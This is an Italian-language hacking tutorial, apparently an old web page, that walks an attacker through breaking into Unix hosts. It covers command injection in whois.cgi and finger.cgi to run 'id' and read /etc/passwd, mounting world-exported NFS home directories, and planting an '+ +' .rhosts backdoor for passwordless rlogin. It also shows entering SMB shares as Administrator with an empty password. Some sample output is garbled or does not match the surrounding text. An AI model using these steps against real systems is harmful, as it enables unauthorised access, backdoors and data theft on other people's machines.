|
|
|
Intro |
|
Sembra che l'unico modo semplice per poter eseguire comandi su di un host da
remoto sia l'utilizzo del celebre phf, ormai introvabile. |
|
WHOIS.CGI |
|
Il whois.cgi è uno script che permette di verificare on~line l'esistenza di un dominio. Per esempio, se vogliamo ottenere informazioni su di un determinato dominio, basta immettere il nome del dominio nello spazio apposito e premere "Invio", e otteniamo una serie di informazioni sul dominio specificato. Ebbene, la versione 1.0 dello script che effettua questa operazione contiene un bug: se al posto del nome del dominio, inseriamo un comando Unix preceduto da ";" lo script lo esegue e ci restituisce l'output sul browser! Per esempio, se noi mettiamo ;id otteniamo come risposta qualcosa del tipo: uid=501(tritemius) gid=500(users) come se avessimo eseguito il comando id da una shell. Con ;cat < /etc/passwd otterremo la
lista del file delle password (che probabilmente sarà shadowed). ;comando Questo bug è discretamente diffuso: l'ho visto funzionare anche su sistemi abbastanza grandi. Ho trovato solo la prima variante, e l'ho visto funzionare solo su script contrassegnati dal numero di versione 1.0. |
|
FINGER.CGI |
|
Finger è un programma che mostra informazioni sugli utenti di un host. Il
discorso è analogo al whois.cgi bug: ci sono siti che mettono on~line il finger.
La pagina html richiama un cgi, appunto il finger.cgi. Se inseriamo nella
text-box di input un comando Unix preceduto da "|", il comando sarà eseguito,
esattamente come nel caso del whois.cgi. |id otteniamo come risposta qualcosa del tipo: uid=501(tritemius) gid=500(users) Anche questo script è diffuso più o meno come il whois.cgi (forse un pò meno). Non ho info sul numero di versione di questo script. |
|
NETWORK FILE SYSTEM |
|
Abbandoniamo i cgi e veniamo a un classico dell'hacking in ambiente Unix, ovvero
il Network File System. Benché si tratti di un metodo assai datato è
impressionante il numero di sistemi tuttora attaccabili con questo sistema. Unix
permette di condividere directory attraverso una rete. Questo significa che un
computer remoto può "montare" sul proprio sistema una o più directory del
sistema locale. Il computer remoto monta la directory con il comando mount lo
stesso comando utilizzato per montare floppy, cd-rom, partizioni. Dopo che questa
operazione è stata eseguita il sistema remoto può accedere alla directory
condivisa come se questa fosse in locale, come se facesse parte dello stesso
hard-disk; l'utente accede a questa directory come accede a tutte le altre, con
i comandi classici (cd,mv,cp,rm...). Tutto il meccanismo è completamente
trasparente all'utente. showmount -e nomehost Se esistono directory condivise queste verranno listate: /home host1
host2 host3 Questo esempio mostra quello che può risultare dall'esecuzione del comando showmount, ovvero una serie di directory (2 in questo case,home e usr) seguite dal nome degli host che possono accedere a queste risorse. Come si intuisce, queste directory possono essere montate solo dai sistemi elencati (host1,host2,host3). Ma se al posto di host1,host2,host3 ci fosse stato everyone, allora le due directory sarebbero state leggibili da chiunque... Per esempio: showmount -e
www.pippo.com L'host
www.pippo.com esporta 3 directory; queste directory possono essere montate da
qualsiasi sistema!!! mount www.pippo.com:/home /mnt A questo punto nella directory mnt del nostro sistema troveremo il contenuto della directory home dell'host www.pippo.com! Con cd mnt avremo la lista della directory home /joe /john /mike Ora basta entrare nella direcotry di un utente (es.: cd joe),inserire la più classica delle backdoor: echo '+ +' >> .rhosts ed eseguire un login remoto rlogin -l joe www.pippo.com per avere una shell senza richiesta di password. Questo metodo funziona ancora. In Oriente si trovano molti sistemi con questo tipo di problema. |
|
NETBIOS & LINUX: SAMBA HACKING |
|
Molti avranno
già sperimentato il netbios hacking da Windows utilizzando
netstat. Qui viene illustrato come la stessa tecnica può essere utilizzata
anche con Linux; si deve sapere inoltre che la condivisione di risorse tramite
netbios (la famosa porta 139) non è una caratteristica dei sistemi Microsoft:
anche Unix permette lo stesso tipo di servizio tramite Samba server. Usage:
smbclient service <password> [-p port] [-d debuglevel] [-l log]
A noi interessa l'opzione -L smbclient -L
"nome_host_dns" Questo comando mostra le eventuali risorse che il sistema remoto mette a disposizione:
Sharename
Type Comment This machine has a browse list: Server
Comment
Workgroup
Master
smbclient \\\\VITTIMA\\X -I ip_vittima Dove ip_vittima è l'ip che avrete ottenuto con il lookup del nome_host_dns. Talvolta appare la richiesta di una password: normalmente basta battere invio per ottenere l'accesso; se questo non dovesse funzionare, si può tentare di entrare specificando l'account con l'opzione -U smbclient \\\\VITTIMA\\X -I ip_vittima -U Administrator battendo sempre invio all'eventuale richiesta di password. Una volta entrati vi troverete di fronte a un prompt del tipo smb> e potrete interagire con il server più o meno come si farebbe con ftp. Con ? si ottiene la lista dei comandi: smb: \> ?
è possibile anche montare la diretory remota come si fa con il NFS che abbiamo visto prima: però invece di usare mount si usa smbmount: smbmount //VITTIMA/X /mnt -I <ip_vittima> Per poter
montare il SMB file system ci si deve assicurare che il proprio kernel lo
supporti; in caso contrario sarà necessario ricompiarlo includendo questa
caratteristica. |